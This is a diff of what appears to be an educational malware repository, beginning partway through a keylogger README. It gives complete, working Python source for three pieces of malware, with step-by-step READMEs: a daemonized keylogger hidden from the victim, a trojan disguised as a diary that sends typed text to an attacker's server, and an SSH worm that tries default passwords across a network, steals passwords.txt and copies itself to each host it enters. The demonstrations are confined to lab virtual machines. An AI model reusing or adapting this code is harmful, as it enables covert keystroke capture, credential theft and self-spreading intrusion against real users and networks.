+Key: P
+Key: a
+Key: s
+Key: s
+Key: w
+Key: d
+```
+
+Creation of **keylogger** is very simple process as it is described below and anyone can do it just with a basic knowledge of programming and understandment of operating systems. That's why we should be always cautions when we execute any uncommon or not trusted file.
+
+#### How does it work?
+
+ - Firstly, we configure our logger. We can specify the file in which should be the data stored as well as a format of the message.
+   ```python
+   logging.basicConfig(
+       level=logging.DEBUG,
+       filename='activity.log',
+       format='Key: %(message)s',
+   )
+   ```
+ - Then we have to obtain the logging file handler. We will explain why in the next step.
+   ```python
+   handler = logging.getLogger().handlers[0].stream
+   ```
+ - To make our spyware harder to spot by the victim, we want it to run in the background as a **daemon**.
+   To learn more about daemons, see [the guide to daemons](https://kb.iu.edu/d/aiau). For this purpose we
+   will use a standart Python module `daemon` that will allow us to daemonize our **keylogger**.
+   When the the daemon is created, we will loose connections to all file handler like `stdout` or even 
+   our logging file unless we specify that the files should be preserved. That's why we have obtained
+   logging file handler in the previous step. In the context of our hidden daemon we can now create the
+   keylogger and start its activity.
+   ```python
+   # Daemonize the process to hide it from the victim.
+   with daemon.DaemonContext(files_preserve=[handler]):
+       # Create keylogger.
+       keylogger = Keylogger('SimpleSpyware')
+       # Start logging activity of the user.
+       keylogger.start_logging()
+   ```
+  - For obtaining the _key press events_ we can use a python module for Linux called `pyxhook`. If we
+    would create a keylogger for Windows, we should use module `pyHook` instead, but their interface is
+    very similar. We create a **hooking manager**, that will manage event handling and allows us to 
+    set a callback for those events. Callback is in our case a function that will be called each time a new
+    event is obtained (__keydown_callback_). The only thing this method does is logging the key into our
+    specified file `activity.log`.
+    ```python
+    hook_manager = pyxhook.HookManager()
+    # Assign callback for handling key strokes.
+    hook_manager.KeyDown = self._keydown_callback
+    # Hook the keyboard and start logging.
+    hook_manager.HookKeyboard()
+    hook_manager.start()
+    ```

spyware/keylogger.py

@@ -0,0 +1,56 @@
+#!/usr/bin/env python3
+
+""" Implementation of simple keylogger in Python.
+"""
+
+import daemon
+import logging
+import pyxhook
+
+
+class Keylogger:
+    """ This class represents the code injecting malware. """
+
+    def __init__(self, name):
+        self._name = name
+
+    @property
+    def name(self):
+        """ Name of the malware. """
+        return self._name
+
+    @name.setter
+    def name(self, new_name):
+        self._name = new_name
+
+    def start_logging(self):
+        """ Log every keystroke of the user into log file. """
+        # Crete hook manager.
+        hook_manager = pyxhook.HookManager()
+        # Assign callback for handling key strokes.
+        hook_manager.KeyDown = self._keydown_callback
+        # Hook the keyboard and start logging.
+        hook_manager.HookKeyboard()
+        hook_manager.start()
+
+    def _keydown_callback(self, key):
+        """ This function is handler of key stroke event. """
+        logging.debug(chr(key.Ascii))
+
+
+if __name__ == '__main__':
+    # Setup logger.
+    logging.basicConfig(
+        level=logging.DEBUG,
+        filename='activity.log',
+        format='Key: %(message)s',
+    )
+    # Get file handler. We need to pass it to our daemon.
+    handler = logging.getLogger().handlers[0].stream
+
+    # Daemonize the process to hide it from the victim.
+    with daemon.DaemonContext(files_preserve=[handler]):
+        # Create keylogger.
+        keylogger = Keylogger('SimpleSpyware')
+        # Start logging activity of the user.
+        keylogger.start_logging()

trojan/README.md

@@ -0,0 +1,91 @@
+# Trojan
+
+Our **trojan** is implemented in the file `trojan.py`. It tries to collect data from the victim disquised as a common diary and send them secretly to the server of the attacker. The server is implemented in the file `server.py`. We should be able to see all notes written into the diary without any knowledge of the victim. 
+
+#### Demonstration of behavior
+
+The first thing that the attacker must do is to set a server that collects data sent by the victim. That's why we setup a running server on our computer by running `./server.py`. You should see the following text:
+```
+DEBUG:user:Server was successfully initialized.
+```
+In the second console run the **trojan** (diary) as the victim with the command `./trojan.py`. On the attacker's console we should immediately see the following text: 
+```
+Connection with trojan established from ('127.0.0.1', 46682)
+```
+That means that our client has made a successful connection to our server. Type a few lines of notes into the diary. We can observe that all notes are being shown to the attacker as well.
+
+##### What does the victim see
+```
+Hello, this is your diary. You can type here your notes:
+Hello diary,
+let me tell you a secret.
+...
+```
+##### What does the attacker see
+```
+DEBUG:user:Server was successfully initialized.
+Connection with trojan established from ('127.0.0.1', 46682)
+INFO:user:b'Hello diary,\n'
+INFO:user:b'let me tell you a secret.\n'
+...
+```
+
+Creation of basic **trojan** is very simple process as it is described below and anyone can do it just with the basic knowledge of programming and understandment of operating systems. That's why we should be always cautious when we execute any uncommon or not trusted file.
+
+#### How does it work?
+
+##### Server
+
+- Firstly, we create our **server** that should collect the data obtained from **trojan** executed 
+  by the victim. The server will listen on the specific port that must be the same as is specified in our **trojan**.
+  In this example will be both the **server** and **trojan** executed on the same computer, but the
+  **server** might be remote and located anywhere in the world.
+  ```python
+  server = Server(27000)
+  ```
+  The communication is realized via **TCP** protocol specified by `socket.SOCK_STREAM` (To learn more about network protocols see [the guide to network communication](https://support.holmsecurity.com/hc/en-us/articles/212963869-What-is-the-difference-between-TCP-and-UDP-). <br>
+  ```python
+  self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+  ```
+  
+- Then we must initialize the server by binding it to the specified port.
+  ```python
+  server.initialize()
+  ```
+- The most important part is the connection with the victim. This is implemented in the function _collect_data_ provided by the **server**. It waits for the connection initiated by the **trojan** after its execution on the victim's system. After that it just constantly checks whether the client has sent any data. If so, they are logged into the console so that the attacker can see them. If the sent data are "empty", the client has closed the connection.
+  ```python
+  while True:
+      data = connection.recv(1024)
+      if not data:
+          break
+      logging.debug(data)
+  ``` 
+
+##### Trojan (client)
+
+- Firstly, we must create our **trojan**. The service requires a name of the host (server) and the
+  specified port for the communication. Host named `localhost` means that the server is listening on the same
+  system as our client.
+  ```python
+  trojan = Trojan('localhost', 27000)
+  ```
+- Now we try to connect to the server. This connection should remain hidden to the victim. The logging
+  message is presented just so we can spot any errors in our example.
+  ```python
+  try:
+      self.socket.connect((self.host, self.port))
+  except socket.error:
+      logging.debug('Trojan could not connect to the server.')
+      return
+  ```
+  
+ - Then the **trojan** tries to act like a harmless program by greeting the victim. 
+   ```python
+   print('Hello, this is your diary. You can type your notes here:')
+   ```
+-  As the victim types his or her notes into the diary (`stdin`), each line is sent to the **attacker's server**. We expect the data to be encoded as **UTF-8** and because the communication interface expects _binary_ data, we must transform the obtained _strings_ into _bytes_.
+   ```python
+   while True:
+       character = sys.stdin.read(1)
+       self.socket.send(bytes(character, 'utf-8'))
+   ```

trojan/server.py

@@ -0,0 +1,65 @@
+#!/usr/bin/env python3
+
+""" Implementation of the server that collects data sent by trojan.
+"""
+
+import logging
+import socket
+
+
+class Server:
+    """ This class represents a server of the attacker that
+    collects data from the victim.
+    """
+
+    def __init__(self, port):
+        self._port = port
+        # Initialize the socket for connection.
+        self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+    @property
+    def port(self):
+        """ Port, on which the server runs (`int`). """
+        return self._port
+
+    @port.setter
+    def port(self, new_port):
+        self._port = new_port
+
+    @property
+    def socket(self):
+        """ Server socket. """
+        return self._socket
+
+    def initialize(self):
+        """ Initialize server before session. """
+        try:
+            self.socket.bind(('localhost', self._port))
+            self.socket.listen()
+            logging.debug('Server was successfully initialized.')
+        except socket.error:
+            print('Server was not initialized due to an error.')
+
+    def collect_data(self):
+        """ Collect data from client trojan application. """
+        # Establish a connection with the victim.
+        connection, address = self.socket.accept()
+        with connection:
+            print('Connection with trojan established from {}'.format(address))
+
+            # Receive data sent by trojan diary.
+            while True:
+                data = connection.recv(1024)
+                if not data:
+                    break
+                logging.info(data)
+
+
+if __name__ == '__main__':
+    logging.basicConfig(level=logging.DEBUG)
+
+    # Create and initialize a server running on attacker's side.
+    server = Server(27000)
+    server.initialize()
+    # Collect the data sent by trojan that was executed on victim's side.
+    server.collect_data()

trojan/trojan.py

@@ -0,0 +1,71 @@
+#!/usr/bin/env python3
+
+""" Implementation of trojan that collects data and sends them to server.
+    It acts like an ordinary diary.
+"""
+
+import logging
+import socket
+import sys
+
+
+class Trojan:
+    """ This class represents the implementation of trojan disguised
+        as diary.
+    """
+
+    def __init__(self, host, port):
+        self._host = host
+        self._port = port
+        # Initialize socket for the connection.
+        self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+    @property
+    def host(self):
+        """ Server that collects obtained data. """
+        return self._host
+
+    @host.setter
+    def host(self, new_host):
+        self._host = new_host
+
+    @property
+    def port(self):
+        """ Port, on which the server runs (`int`). """
+        return self._port
+
+    @port.setter
+    def port(self, new_port):
+        self._port = new_port
+
+    @property
+    def socket(self):
+        """ Client socket. """
+        return self._socket
+
+    def collect_data(self):
+        """ Secretly collect data and send them to server. """
+        # Create a connection to the server.
+        try:
+            self.socket.connect((self.host, self.port))
+        except socket.error:
+            logging.debug('Trojan could not connect to the server.')
+            return
+
+        # Try to act as an ordinary diary.
+        print('Hello, this is your diary. You can type here your notes: ')
+
+        # Read notes written by the victim and send them to the server.
+        while True:
+            character = sys.stdin.read(1)
+            self.socket.send(bytes(character, 'utf-8'))
+
+
+if __name__ == '__main__':
+    logging.basicConfig(level=logging.DEBUG)
+
+    # Initialize trojan application that acts like an diary.
+    trojan = Trojan('localhost', 27000)
+    # Collect the data and send them to the server running
+    # on the attacket's side.
+    trojan.collect_data()

worm/README.md

@@ -0,0 +1,88 @@
+# Worm
+
+Our **worm** is implemented in the file `worm.py`. It tries to spread over the selected network via **SSH** connection and copy itself on the remote host. If the victim has a file **passwords.txt** in the home directory, it will obtain the file and send it back to the system of the attacker.
+
+#### Demonstration of behavior
+
+A valid infrastructure needs to be setup for this example. We need at least two hosts on the same network. To do this, it is recommended to setup two **virtual machines**, one for the attacker and one for the victim. To learn more about virtual machines, see [the guide to virtual machines](https://www.lifewire.com/virtual-machine-4147598). A free and popular virtualization tool is [Oracle VM VirtualBox](https://www.virtualbox.org/). For the system of the victim use [Metasploitable2](https://sourceforge.net/projects/metasploitable/files/Metasploitable2/) (a simple Linux VM often used for demostration of security vulnerabilities). Once you create both VMs, to connect them to the same network in VirtualBox go to _Setting->Network->AdapterN->Attached to_ and select Internal network. This must be done for both VMs.
+
+Now run both systems and log in. The default credentials on the **Metasploitable2** are 
+```
+user: msfadmin
+pass: msfadmin
+```
+Make sure that you have this repo cloned on the system of the attacker. The last thing we have to do is to assign valid **IP addresses** to both machines. This can be done with the following command:
+```
+ip addr add [IP addr]/24 dev [Interface]
+```
+Assign **198.168.0.3** to the victim and **168.168.0.2** to the attacker. To make sure you have done everything correctly, make the systems ping each other.
+```
+Victim:   ping 198.168.0.2
+Attacker: ping 198.168.0.3
+```
+If you can see the response, everything is fine and we can proceed to the actual demonstration.
+
+Make a simple file on the victim's system containing something like the following text and name it **passwords.txt**. This represents private file of the user on the vulnerable system.
+```
+My social media credentials
+---------------------------
+user: user
+pass: mysecurepassword
+```
+
+Finally, we can execute our worm on the system of the attacker (`./worm.py`). This worm will try to access each host on the network and log in via **SSH**. To learn more about **SSH** see [the guide to SSH](https://medium.com/@Magical_Mudit/understanding-ssh-workflow-66a0e8d4bf65). If it succeeds, it copies itself on the vulnerable system and steals the file **passwords.txt** if the user has one. If everything was done correctly, you should see the following log of the worm. It has tried to log in to hosts **198.168.0.1** and **198.168.0.2** with various credentials and failed. But it has successfully connected to **2 users** on the system **198.168.0.3** and stole the password file from one of them. You should see this file in the same directory on the system of the attacker.
+
+```
+DEBUG:root:Trying to spread on the remote host: 198.168.0.1
+DEBUG:root:The remote host refused connection with credentials user,user.
+DEBUG:root:The remote host refused connection with credentials root,root.
+DEBUG:root:The remote host refused connection with credentials msfadmin,msfadmin.
+
+DEBUG:root:Trying to spread on the remote host: 198.168.0.2
+DEBUG:root:The remote host refused connection with credentials user,user.
+DEBUG:root:The remote host refused connection with credentials root,root.
+DEBUG:root:The remote host refused connection with credentials msfadmin,msfadmin.
+
+DEBUG:root:Trying to spread on the remote host: 198.168.0.3
+DEBUG:root:The worm is succesfully connected to the remote host [user, user].
+DEBUG:root:The victim did not have passwords.txt
+DEBUG:root:The remote host refused connection with credentials user,user.
+DEBUG:root:The remote host refused connection with credentials root,root.
+DEBUG:root:The worm is succesfully connected to the remote host [msfadmin, msfadmin].
+DEBUG:root:The victim had passwords.txt
+...
+```
+
+The creation of **worm** itself is very simple process as it is described below and anyone can do it just with a basic knowledge of programming and understandment of networking. That's why we should keep our systems updated, secured and credentials strong.
+
+#### How does it work?
+
+- Firstly, we create our **worm** and pass it a **network address** representing the network, on which it should spread.
+  ```python
+  worm = Worm('198.168.0.0')
+  ```
+- Then we call function _spread_via_ssh_, which tries to connect to each host on the network, establish an **SSH** connection and spread itself (while stealing the password file).
+  ```python
+  worm.spread_via_ssh()
+  ```
+- At the beginning, this method creates an **SSHClient** from _paramiko_ module that would help us to create the connection.
+  ```python
+  ssh = paramiko.SSHClient()
+  ssh.get_missing_host_key_policy(paramiko.AutoAddPolicy())
+  ```
+- Then it iterates over all host addresses on the network (implemented as generator _generate_addresses_on_network_). The worm contains property _credentials_, which represents combinations of usernames and passwords that the worm is willing to try. That means that it will try to login via **SSH** 3 times on each host. **SSH** uses port 22.
+  ```python
+  for remote_address in self.generate_addresses_on_network():
+      for user, passw in self.credentials:
+          try:
+              ssh.connect(remote_address, port=22, username=user, password=passw)
+              ...
+  ```
+- If the connection fails, it is captured as an exception and the worm continues with another user or host. However, if the connection is established (as in the case of **198.162.0.3**), we can create an **SCP client** that will transmit our files. To learn more about **SCP**, see [the guide to SCP](https://en.wikipedia.org/wiki/Secure_copy).
+  ```
+  scp_client = scp.SCPClient(ssh.get_transport())
+- Now we can execute file transmition commands. One will obtain the password file and the second one will send the worm to the remote host. A name of the file is obtained from the system arguments.
+  ```python
+  scp_client.get('password.txt')
+  scp_client.put(sys.argv[0])
+  ```

worm/worm.py

@@ -0,0 +1,98 @@
+#!/usr/bin/env python3
+
+""" Implementation of simple worm that spreads via SSH connection.
+"""
+
+import logging
+import paramiko
+import scp
+import sys
+
+
+class Worm:
+    """ This class represents implementation of worm that spreads via SSH
+    connections.
+    """
+
+    def __init__(self, network_address):
+        self._network = network_address
+
+    @property
+    def network(self):
+        """ Network, on which the worm spreads. """
+        return self._network
+
+    @network.setter
+    def network(self, new_network):
+        self._network = new_network
+
+    @property
+    def credentials(self):
+        """ Possible SSH credentials of the victim. """
+        return (
+            ('user', 'user'),
+            ('root', 'root'),
+            ('msfadmin', 'msfadmin')
+        )
+
+    def generate_addresses_on_network(self):
+        """ Generate addresses of hosts on the given network.
+        For simplicity is expected the following mask:
+        255.255.255.0
+        """
+        network = self.network.split('.')
+        for host in range(1, 256):
+            network[-1] = str(host)
+            yield '.'.join(network)
+
+    def spread_via_ssh(self):
+        """ Spread the worm on the network via SSH connections.
+        To establish SSH connection try selected user-password
+        combinations. When the connection is established, copy
+        the worm to the remote host.
+        """
+        # Setup SSH client.
+        ssh = paramiko.SSHClient()
+        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+
+        for remote_address in self.generate_addresses_on_network():
+            logging.debug('Trying to spread on the remote host: {}'.format(remote_address))
+            print()
+
+            for user, passw in self.credentials:
+                try:
+                    ssh.connect(remote_address, port=22, username=user, password=passw, timeout=10)
+                    logging.debug('The worm is succesfully connected to the remote host [{}, {}].'.format(user, passw))
+
+                    # Create SCP client for file transmission.
+                    with scp.SCPClient(ssh.get_transport()) as scp_client:
+                        # Obtain file with victim's passwords.
+                        try:
+                            scp_client.get('passwords.txt')
+                            logging.debug('The victim had passwords.txt')
+                        except Exception:
+                            logging.debug('The victim did not have passwords.txt')
+
+                        # Upload worm to the remote host.
+                        try:
+                            scp_client.put(sys.argv[0])
+                            logging.debug('The worm has been uploaded to victim')
+                        except Exception:
+                            logging.debug('The worm could not be uploaded to victim')
+
+                    print()
+                except Exception:
+                    logging.debug('The remote host refused connection with credentials {},{}.'.format(user, passw))
+                    print()
+
+        ssh.close()
+
+if __name__ == '__main__':
+    logging.basicConfig(level=logging.DEBUG)
+    # Disable basic logging of paramiko to make log easier to read.
+    logging.getLogger('paramiko').setLevel(logging.CRITICAL)
+
+    # Initialize worm with the network address.
+    worm = Worm('198.168.0.0')
+    # Spread via SSH connection on the network.
+    worm.spread_via_ssh()